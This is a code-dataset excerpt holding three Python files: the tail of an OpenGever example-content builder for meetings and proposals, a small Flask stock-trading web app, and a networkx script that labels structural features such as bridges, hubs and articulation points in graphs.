'ordnungssystem/ressourcen-und-support/finanzen/planung/finanzplanung/dossier-6')\n self.dossier_equipment = self.site.restrictedTraverse(\n 'ordnungssystem/ressourcen-und-support/finanzen/planung/investitionsplanung/dossier-7')\n\n self.dossier_baufrau = self.site.restrictedTraverse(\n 'ordnungssystem/ressourcen-und-support/personal/personalrekrutierung/dossier-5')\n self.dossier_laws_1 = self.site.restrictedTraverse(\n 'ordnungssystem/bevoelkerung-und-sicherheit/einwohnerkontrolle/dossier-1')\n self.dossier_laws_2 = self.site.restrictedTraverse(\n 'ordnungssystem/bevoelkerung-und-sicherheit/einwohnerkontrolle/dossier-2')\n self.repository_folder_meeting_word = self.site.restrictedTraverse(\n 'ordnungssystem/fuehrung/gemeinderecht')\n\n self.document_baufrau_1 = self.dossier_baufrau['document-2']\n self.document_baufrau_2 = self.dossier_baufrau['document-3']\n self.document_baufrau_3 = self.dossier_baufrau['document-4']\n\n self.document_taxes_1 = self.dossier_taxes_1['document-4']\n self.document_taxes_2 = self.dossier_taxes_1['document-5']\n self.document_taxes_3 = self.dossier_taxes_2['document-6']\n\n self.document_laws_1 = self.dossier_laws_1['document-4']\n self.document_laws_2 = self.dossier_laws_1['document-5']\n\n self.document_equipment_1 = self.dossier_equipment['document-7']\n self.document_equipment_2 = self.dossier_equipment['document-8']\n\n def setup_builders(self):\n session.current_session = session.BuilderSession()\n session.current_session.session = self.db_session\n\n def create_content(self):\n self.create_periods()\n self.create_members_and_memberships()\n self.create_meetings_word()\n self.create_proposals_word()\n\n def create_periods(self):\n create(Builder('period').having(\n start=date(2016, 1, 1),\n end=date(2016, 12, 31)).within(self.committee_law))\n create(Builder('period').having(\n start=date(2016, 1, 1),\n end=date(2016, 12, 31)).within(self.committee_accounting))\n create(Builder('period').having(\n start=date(2016, 1, 1),\n end=date(2016, 12, 31)).within(self.committee_assembly))\n create(Builder('period').having(\n start=date(2016, 1, 1),\n end=date(2016, 12, 31)).within(self.committee_evil))\n\n def create_members_and_memberships(self):\n peter = create(Builder('member')\n .having(firstname=u'Peter', lastname=u'M\\xfcller',\n admin_unit_id=get_current_admin_unit().id()))\n hans = create(Builder('member')\n .having(firstname=u'Hans', lastname=u'Meier',\n admin_unit_id=get_current_admin_unit().id()))\n\n for committee in [self.committee_law_model,\n self.committee_assembly_model]:\n create(Builder('membership')\n .having(committee=committee,\n member=peter,\n date_from=date.today(),\n date_to=date.today() + timedelta(days=512)))\n\n create(Builder('membership')\n .having(committee=committee,\n member=hans,\n date_from=date.today(),\n date_to=date.today() + timedelta(days=512)))\n\n def create_meetings_word(self):\n self.dossier_word, self.meeting_word = self.create_meeting_word(delta=1)\n\n # create future meetings\n for delta in [30, 60, 90, 120]:\n self.create_meeting_word(delta=delta)\n\n def create_meeting_word(self, delta):\n start = self.tz.localize(\n datetime.combine(date.today() + timedelta(days=delta), time(10, 0)))\n end = self.tz.localize(\n datetime.combine(date.today() + timedelta(days=delta), time(12, 0)))\n title = u\"Kommission f\\xfcr Rechtsfragen, {}\".format(\n api.portal.get_localized_time(datetime=start))\n\n dossier = create(Builder('meeting_dossier')\n .having(\n responsible=u'lukas.graf',\n title=u'Meeting {}'.format(\n api.portal.get_localized_time(start)),)\n .within(self.repository_folder_meeting_word))\n meeting = create(Builder('meeting')\n .having(title=title,\n committee=self.committee_law_model,\n location=u'Bern',\n start=start,\n end=end,)\n .link_with(dossier))\n return dossier, meeting\n\n def create_proposals_word(self):\n proposal1 = create(\n Builder('proposal')\n .within(self.dossier_baufrau)\n .having(committee=self.committee_law_model,\n title=u'Genehmigung der Anstellung von Hannah Baufrau als '\n u'Sachbearbeiterin einem Besch\\xe4ftigungsgrad von 90%')\n .relate_to(self.document_baufrau_1,\n self.document_baufrau_2,\n self.document_baufrau_3)\n .with_proposal_file(assets.load('vertragsentwurf.docx'))\n .as_submitted())\n self.meeting_word.schedule_proposal(proposal1.load_model())\n\n self.meeting_word.schedule_ad_hoc(\n u'Genehmigung der Bestellung von Hannah Baufrau als Sachbearbeterin '\n u'einem Besch\\xe4ftigungsgrad von 90%')\n\n create(\n Builder('proposal')\n .within(self.dossier_laws_1)\n .having(committee=self.committee_law_model,\n title=u'Revision der Rechtslage f\\xfcr eine Liberalisierung')\n .relate_to(self.document_laws_1, self.document_laws_2)\n .with_proposal_file(assets.load('vertragsentwurf.docx')))\n\n self.meeting_word.schedule_ad_hoc(\n u'Revision der Linkslage f\\xfcr eine Liberalisierung')\n", "sub_path": "opengever/examplecontent/meeting.py", "file_name": "meeting.py", "file_ext": "py", "file_size_in_byte": 7734, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pytz.timezone", "line_number": 22, "usage_type": "call"}, {"api_name": "opengever.base.model.create_session", "line_number": 26, "usage_type": "call"}, {"api_name": "ftw.builder.session.current_session", "line_number": 71, "usage_type": "attribute"}, {"api_name": "ftw.builder.session", "line_number": 71, "usage_type": "name"}, {"api_name": "ftw.builder.session.BuilderSession", "line_number": 71, "usage_type": "call"}, {"api_name": "ftw.builder.session.current_session", "line_number": 72, "usage_type": "attribute"}, {"api_name": "ftw.builder.session", "line_number": 72, "usage_type": "name"}, {"api_name": "ftw.builder.create", "line_number": 81, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 82, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 83, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 84, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 85, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 86, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 87, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 87, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 88, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 89, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 90, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 90, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 91, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 92, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 95, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 95, "usage_type": "call"}, {"api_name": "opengever.ogds.base.utils.get_current_admin_unit", "line_number": 97, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 98, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 98, "usage_type": "call"}, {"api_name": "opengever.ogds.base.utils.get_current_admin_unit", "line_number": 100, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 104, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 104, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 107, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 108, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 108, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 110, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 113, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 113, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 114, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 114, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 114, "usage_type": "call"}, {"api_name": "datetime.datetime.combine", "line_number": 125, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 125, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 125, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 125, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 125, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 125, "usage_type": "call"}, {"api_name": "datetime.datetime.combine", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 127, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 127, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 127, "usage_type": "call"}, {"api_name": "plone.api.portal.get_localized_time", "line_number": 129, "usage_type": "call"}, {"api_name": "plone.api.portal", "line_number": 129, "usage_type": "attribute"}, {"api_name": "plone.api", "line_number": 129, "usage_type": "name"}, {"api_name": "ftw.builder.create", "line_number": 131, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 131, "usage_type": "call"}, {"api_name": "plone.api.portal.get_localized_time", "line_number": 135, "usage_type": "call"}, {"api_name": "plone.api.portal", "line_number": 135, "usage_type": "attribute"}, {"api_name": "plone.api", "line_number": 135, "usage_type": "name"}, {"api_name": "ftw.builder.create", "line_number": 137, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 137, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 147, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 148, "usage_type": "call"}, {"api_name": "opengever.testing.assets.load", "line_number": 156, "usage_type": "call"}, {"api_name": "opengever.testing.assets", "line_number": 156, "usage_type": "name"}, {"api_name": "ftw.builder.create", "line_number": 164, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 165, "usage_type": "call"}, {"api_name": "opengever.testing.assets.load", "line_number": 170, "usage_type": "call"}, {"api_name": "opengever.testing.assets", "line_number": 170, "usage_type": "name"}]} +{"seq_id": "333618462", "text": "from flask import Flask, render_template, url_for, redirect, request, session\nimport utils\nimport auth\n\napp = Flask(__name__)\napp.secret_key = 'secretkey'\n\n@app.route(\"/\")\n@app.route(\"/home.html\")\ndef home():\n if 'username' in session:\n return render_template('home.html', username=session['username'])\n else:\n return render_template('home.html')\n\n@app.route(\"/login.html\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method==\"GET\":\n return render_template(\"login.html\")\n else:\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n if (auth.login(username,password)):\n session[\"username\"] = username\n return render_template('home.html', username=session['username'])\n else:\n return redirect(url_for(\"login\"))\n\n@app.route(\"/register.html\", methods=['GET', 'POST'])\ndef register():\n if request.method == \"GET\":\n return render_template(\"register.html\")\n else:\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n if auth.register(username,password):\n session['username'] = username\n return redirect(url_for('home'))\n else:\n return render_template(\"register.html\") #return specific error?\n\n@app.route(\"/portfolio\")\ndef portfolio():\n if 'username' in session:\n user = session['username']\n return render_template(\"portfolio.html\",username = user,cash=auth.getCash(user), stocks = auth.getStocks(user))\n else:\n return redirect(\"/register\")\n \n@app.route(\"/buynsell.html\", methods=['GET', 'POST'])\ndef buynsell():\n if request.method == \"GET\":\n if 'username' in session:\n return render_template(\"buynsell.html\", username = session['username'])\n else:\n return render_template('buynsell.html')\n else:\n symb = request.form['symbol']\n num = request.form['number']\n action = request.form['action']\n user = session['username']\n if action == 'buy':\n auth.buy(session['username'], symb, num)\n return redirect(\"/portfolio\")\n else:\n auth.sell(session['username'], symb, num)\n return redirect(\"/portfolio\")\n\n@app.route(\"/search.html\", methods=[\"GET\", \"POST\"])\ndef search():\n if request.method == \"GET\":\n if 'username' in session:\n return render_template(\"search.html\",username = session[\"username\"])\n else:\n return render_template(\"search.html\")\n else:\n symb = request.form['symb']\n q = utils.init(symb)\n if 'username' in session:\n return render_template(\"stocks.html\",username = session[\"username\"], q=q)\n else:\n return render_template(\"stocks.html\", q=q)\n\n@app.route(\"/logout.html\")\ndef logout():\n session.pop(\"username\", None)\n return redirect(url_for(\"home\"))\n \nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0',port=5000)\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3007, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 11, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 12, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "auth.login", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 35, "usage_type": "name"}, {"api_name": "auth.register", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 46, "usage_type": "call"}, {"api_name": "auth.getCash", "line_number": 46, "usage_type": "call"}, {"api_name": "auth.getStocks", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 61, "usage_type": "name"}, {"api_name": "auth.buy", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 63, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 64, "usage_type": "call"}, {"api_name": "auth.sell", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 71, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 71, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 77, "usage_type": "name"}, {"api_name": "utils.init", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 79, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.session.pop", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "635620326", "text": "import csv\nimport networkx as nx\n\ndef Extract_Global_High_Neighbor(G, heigh_neighbour, s=0):\n '''\n :param G: original graph\n :param heigh_neighbour: the first x heigh degree nodes\n :return: G with label 1 (Global_High_Neighbor)\n '''\n nodes_num = round(heigh_neighbour * len(G))\n node_degree = [[n, d] for n, d in G.degree()]\n sort_node_degree = sorted(node_degree, key=lambda tup: tup[1], reverse=True)[:nodes_num]\n\n hubs = []\n for i in sort_node_degree:\n hubs.append(i[0])\n\n new_node = 0\n for node in hubs:\n if G.node[node]['global'] == 0:\n G.node[node]['global'] = 1\n new_node += 1\n else:\n G.node[node]['global'] = 2\n\n if s == 1:\n for n, data in G.nodes(data='global'):\n if data == 1 and n not in hubs:\n G.node[n]['global'] = 0\n\n print(\"heigh_hubs : %d\" % len(sort_node_degree))\n if s == 1:\n print(\"heigh_hubs new : %d\" % new_node)\n return(len(sort_node_degree), new_node)\n else:\n return (len(sort_node_degree))\n # return(G)\n\n# Extract the star structure in the graph\ndef Extract_Star(G, threshold, s=0):\n '''\n :param G: original graph\n :return: G with label 1 (Star)\n '''\n\n # find star\n star = []\n star_num = {}\n star_threshold = threshold\n flag = 0\n node_sort = sorted(list(G.nodes()))\n for node in node_sort:\n # find nodes's neighbor\n node_neighbor = list(G.neighbors(node))\n if len(node_neighbor) > star_threshold:\n for node1 in node_neighbor:\n flag = 1\n node1_neighbor = list(G.neighbors(node1))\n\n list1 = list(set(node_neighbor) & set(node1_neighbor))\n\n if len(list1) != 0:\n flag = 0\n break\n if flag == 1:\n star.append(node)\n star_num[node] = len(node_neighbor)\n else:\n continue\n\n new_node = 0\n for n in star:\n if G.node[n]['star'] == 0:\n G.node[n]['star'] = 1\n new_node += 1\n else:\n G.node[n]['star'] = 2\n\n if s == 1:\n for n, data in G.nodes(data='star'):\n if data == 1 and n not in star:\n G.node[n]['star'] = 0\n\n\n print(\"heigh_star : %d\" % len(star))\n if s == 1:\n print(\"heigh_star new : %d\" % new_node)\n return(len(star), new_node)\n else:\n return(len(star))\n # return(G)\n\n\n# load graph to networkx\ndef loadData(path1, path2, isDirect):\n\n # add nodes\n f = open(path1, \"r\")\n reader1 = csv.reader(f)\n nodes = []\n type1 = []\n for item in reader1:\n nodes.append(int(item[0]))\n type1.append(int(item[1]))\n f.close()\n if isDirect:\n G = nx.DiGraph()\n else:\n G = nx.Graph()\n G.add_nodes_from(nodes)\n\n # add node attribution\n k = 0\n for n, data in G.nodes(data=True):\n G.node[n]['global'] = 0\n G.node[n]['star'] = 0\n G.node[n]['isolates'] = 0\n G.node[n]['arti'] = 0\n G.node[n]['type1'] = type1[k]\n k += 1\n\n # add edges\n f = open(path2, \"r\")\n reader1 = csv.reader(f)\n edges = []\n type2 = []\n for item in reader1:\n edges.append([int(item[0]), int(item[1])])\n type2.append(int(item[2]))\n f.close()\n G.add_edges_from(edges)\n\n # add edge attribution\n i = 0\n for u, v, d in G.edges(data=True):\n G[u][v]['bridge'] = 0\n G[u][v]['type'] = type2[i]\n i += 1\n\n return(G)\n\ndef find_Bridge(G, s=0):\n bridges = nx.bridges(G)\n old_edge = 0\n bridges = list(bridges)\n\n count = 0\n for i in bridges:\n count += 1\n if G[i[0]][i[1]]['bridge'] == 0:\n G[i[0]][i[1]]['bridge'] = 1\n else:\n old_edge += 1\n G[i[0]][i[1]]['bridge'] = 2\n\n if s == 1:\n for (u, v, d) in G.edges(data='bridge'):\n if d == 1 and (u, v) not in bridges:\n G[u][v]['bridge'] = 0\n\n\n print(\"bridge(edge) : %d\" % count)\n if s == 1:\n print(\"bridge new (edge) : %d\" % (count - old_edge))\n return(count, old_edge)\n else:\n return(count)\n\n\ndef Save_Graph(G, sample_type, filename, iter):\n path = 'res_Data_test2/{}_{}{}_orig.gml'.format(sample_type, filename, iter)\n nx.write_gml(G, path)\n\n\ndef test_Sampling(G, orig_anomalous_edge, orig_anomalous_node):\n G1 = nx.Graph()\n for n, data in G.nodes(data=True):\n if data['type1'] == 2:\n G1.add_node(n)\n for i, j in data.items():\n G1.node[n][i] = j\n\n for (u, v, d) in G.edges(data=True):\n if d['type'] == 2:\n G1.add_edge(u, v)\n for i, j in d.items():\n G1[u][v][i] = j\n degree_total = 0\n for x in G1.nodes():\n degree_total = degree_total + G1.degree(x)\n\n threshold = degree_total / len(G1)\n\n print('nodes number : %d' % G1.number_of_nodes())\n print('edges number : %d' % G1.number_of_edges())\n print(\"average degree: %s\" % threshold)\n print(\"average clustering: %s\" % nx.average_clustering(G1))\n print(\"density: %s\" % nx.density(G1))\n print('---------------------')\n\n sample_anomalous_node = {}\n sample_anomalous_node_old = {}\n\n sample_anomalous_edge = {}\n sample_anomalous_edge_old = {}\n\n\n tmp, t = find_Bridge(G1, s=1)\n sample_anomalous_edge['bridge'] = tmp\n sample_anomalous_edge_old['bridge'] = t\n\n heigh_neighbour = 0.05\n tmp, t = Extract_Global_High_Neighbor(G1, heigh_neighbour, s=1)\n sample_anomalous_node['hub'] = tmp\n sample_anomalous_node_old['hub'] = t\n\n\n tmp, t = Extract_Star(G1, threshold, s=1)\n sample_anomalous_node['star'] = tmp\n sample_anomalous_node_old['star'] = t\n\n\n tmp, t = Articulation_Points(G1, s=1)\n sample_anomalous_node['arti'] = tmp\n sample_anomalous_node_old['arti'] = t\n\n tmp, t = Isolates(G1, s=1)\n sample_anomalous_node['iso'] = tmp\n sample_anomalous_node_old['iso'] = t\n\n sum_node = 0\n for i in sample_anomalous_node:\n sum_node = sum_node + sample_anomalous_node[i]\n\n sum_node_new = 0\n for i in sample_anomalous_node_old:\n sum_node_new = sum_node_new + sample_anomalous_node_old[i]\n\n sum_edge = 0\n for i in sample_anomalous_edge:\n sum_edge = sum_edge + sample_anomalous_edge[i]\n\n sum_edge_old = 0\n for i in sample_anomalous_edge_old:\n sum_edge_old = sum_edge_old + sample_anomalous_edge_old[i]\n\n sum_node_orig = 0\n for i in orig_anomalous_node:\n sum_node_orig = sum_node_orig + orig_anomalous_node[i]\n\n sum_edge_orig = 0\n for i in orig_anomalous_edge:\n sum_edge_orig = sum_edge_orig + orig_anomalous_edge[i]\n\n keys = list(orig_anomalous_node.keys())\n ori = list(orig_anomalous_node.values())\n s_all = list(sample_anomalous_node.values())\n s_new = list(sample_anomalous_node_old.values())\n\n per = {}\n for i in range(len(ori)):\n if ori[i] != 0:\n per[keys[i]] = (s_all[i] - s_new[i]) / ori[i]\n else:\n per[keys[i]] = -1\n keys_edge = list(orig_anomalous_edge.keys())\n ori_e = list(orig_anomalous_edge.values())\n s_old_e = list(sample_anomalous_edge_old.values())\n\n per_e = {}\n for i in range(len(ori_e)):\n if ori_e[i] != 0:\n per_e[keys_edge[i]] = s_old_e[i] / ori_e[i]\n else:\n per_e[keys_edge[i]] = -1\n\n\n per_new = {}\n per_new_old = {}\n new_keys = list(sample_anomalous_node_old.keys())\n for i in range(len(s_new)):\n per_new[new_keys[i]] = s_new[i] / len(G)\n if (s_all[i] - s_new[i]) != 0:\n per_new_old[new_keys[i]] = s_new[i] / (s_all[i] - s_new[i])\n else:\n per_new_old[new_keys[i]] = -1\n\n\n per_new_e = {}\n per_new_old_e = {}\n for i in range(len(ori_e)):\n per_new_e[keys_edge[i]] = (ori_e[i] - s_old_e[i]) / len(list(G.edges()))\n if s_old_e[i] != 0:\n per_new_old_e[keys_edge[i]] = (ori_e[i] - s_old_e[i]) / s_old_e[i]\n else:\n per_new_old_e[keys_edge[i]] = -1\n\n print('--------keep--------')\n for u, v in per.items():\n if v != -1:\n a = '(sensitive) the {} is hold: {:.2%}'.format(u, v)\n print(a)\n else:\n a = '(sensitive) the {} is hold: {}'.format(u, '-')\n print(a)\n print('-----------------')\n for u, v in per_e.items():\n if v != -1:\n b = '(sensitive) the {} is hold: {:.2%}'.format(u, v)\n print(b)\n else:\n b = '(sensitive) the {} is hold: {}'.format(u, '-')\n print(b)\n\n print('--------new--------')\n for u, v in per_new.items():\n if v != -1:\n a = 'the new {} is born: {:.2%}'.format(u, v)\n print(a)\n else:\n a = 'the new {} is born: {}'.format(u, '-')\n print(a)\n print('--------------------')\n for u, v in per_new_old.items():\n if v != -1:\n a = 'the {} new / old rate is : {:.2%}'.format(u, v)\n print(a)\n else:\n a = 'the {} new / old rate is :{}'.format(u, '-')\n print(a)\n print('-----------------')\n for u, v in per_new_e.items():\n if v != -1:\n b = 'the new {} is born: {:.2%}'.format(u, v)\n print(b)\n else:\n b = 'the new {} is born: {}'.format(u, '-')\n print(b)\n print('--------------------')\n for u, v in per_new_old_e.items():\n if v != -1:\n b = 'the {} new / old rate is: {:.2%}'.format(u, v)\n print(b)\n else:\n b = 'the {} new / old rate is: {}'.format(u, '-')\n print(b)\n\n\n # print('--------anomalous--------')\n # print('orig:------------')\n # print(\"anomalous node sum : %d\" % sum_node_orig)\n # print(\"anomalous node rate: %f\" % (sum_node_orig / len(list(G.nodes()))))\n # print('-----------------')\n # print(\"anomalous edge sum : %d\" % sum_edge_orig)\n # print(\"anomalous edge rate: %f\" % (sum_edge_orig / len(list(G.edges()))))\n #\n # print('sample:----------')\n # print(\"sample anomalous node sum (orig) : %d\" % (sum_node - sum_node_new))\n # print(\"sample anomalous node rate (orig): %f\" % ((sum_node - sum_node_new) / len(list(G1.nodes()))))\n # print(\"sample anomalous node sum (new) : %d\" % sum_node_new)\n # print(\"sample anomalous node rate (new): %f\" % (sum_node_new / len(list(G1.nodes()))))\n # print(\"sample anomalous node sum (total) : %d\" % sum_node)\n # print(\"sample anomalous node rate (total): %f\" % (sum_node / len(list(G1.nodes()))))\n # print(\"-----------------\")\n # print(\"sample anomalous edge sum (orig) : %d\" % sum_edge_old)\n # print(\"sample anomalous edge rate (orig): %f\" % (sum_edge_old / len(list(G1.edges()))))\n # print(\"sample anomalous edge sum (new) : %d\" % (sum_edge - sum_edge_old))\n # print(\"sample anomalous edge rate (new): %f\" % ((sum_edge - sum_edge_old) / len(list(G1.edges()))))\n # print(\"sample anomalous edge sum (total) : %d\" % sum_edge)\n # print(\"sample anomalous edge rate (total): %f\" % (sum_edge / len(list(G1.edges()))))\n\n\n add_Anomalous_types(G1, s=1, _G=G)\n\n # print('-----')\n # for n, data in G1.nodes(data='global'):\n # print(n, data)\n\n # for (u, v, d) in G1.edges(data=True):\n # print(u, v, d)\n\n # save graph\n path = 'res_Data/test.gml'\n nx.write_gml(G1, path)\n\n\ndef Articulation_Points(G, s=0):\n l = list(nx.articulation_points(G))\n new_node = 0\n for node in l:\n if G.node[node]['arti'] == 0:\n G.node[node]['arti'] = 1\n new_node += 1\n else:\n G.node[node]['arti'] = 2\n\n print(\"articulation (nodes) : %d\" % len(l))\n\n if s == 1:\n for n, data in G.nodes(data='arti'):\n if data == 1 and n not in l:\n G.node[n]['arti'] = 0\n\n if s == 1:\n print(\"articulation new (nodes) : %d\" % new_node)\n return(len(l), new_node)\n else:\n return(len(l))\n\n\ndef Isolates(G, s=0):\n l = list(nx.isolates(G))\n new_node = 0\n for node in l:\n if G.node[node]['isolates'] == 0:\n G.node[node]['isolates'] = 1\n new_node += 1\n else:\n G.node[node]['isolates'] = 2\n\n if s == 1:\n for n, data in G.nodes(data='isolates'):\n if data == 1 and n not in l:\n G.node[n]['isolates'] = 0\n\n print(\"isolates: %d\" % len(l))\n if s == 1:\n print(\"isolates new : %d\" % new_node)\n return(len(l), new_node)\n else:\n return(len(l))\n\ndef add_Anomalous_types(G, s=0, _G=None):\n\n # nodes\n for n, data in G.nodes(data=True):\n a = list(data.values())\n count = 0\n if s == 0:\n for i in range(len(a) - 1):\n if a[i] != 0:\n count += 1\n if count > 0:\n G.node[n]['anomalous'] = 1\n else:\n G.node[n]['anomalous'] = 0\n else:\n for i in range(len(a) - 2):\n if a[i] != 0:\n count += 1\n if count > 0:\n if G.node[n]['anomalous'] == 0:\n G.node[n]['anomalous2'] = 2 # new anomalous\n _G.node[n]['anomalous2'] = 2 # new anomalous\n else:\n G.node[n]['anomalous2'] = 1\n _G.node[n]['anomalous2'] = 1\n else:\n if G.node[n]['anomalous'] == 1:\n G.node[n]['anomalous2'] = 3 # new disappear\n _G.node[n]['anomalous2'] = 3 # new disappear\n else:\n G.node[n]['anomalous2'] = 0\n _G.node[n]['anomalous2'] = 0\n\n # edges\n for (u, v, d) in G.edges(data=True):\n b = list(d.values())\n count = 0\n if s == 1:\n for i in range(len(b) - 2):\n if b[i] != 0:\n count += 1\n if count > 0:\n if G[u][v]['anomalous'] == 0:\n G[u][v]['anomalous2'] = 2 # new anomalous\n _G[u][v]['anomalous2'] = 2 # new anomalous\n else:\n G[u][v]['anomalous2'] = 1\n _G[u][v]['anomalous2'] = 1\n else:\n if G[u][v]['anomalous'] == 1:\n G[u][v]['anomalous2'] = 3 # new disappear\n _G[u][v]['anomalous2'] = 3 # new disappear\n else:\n G[u][v]['anomalous2'] = 0\n 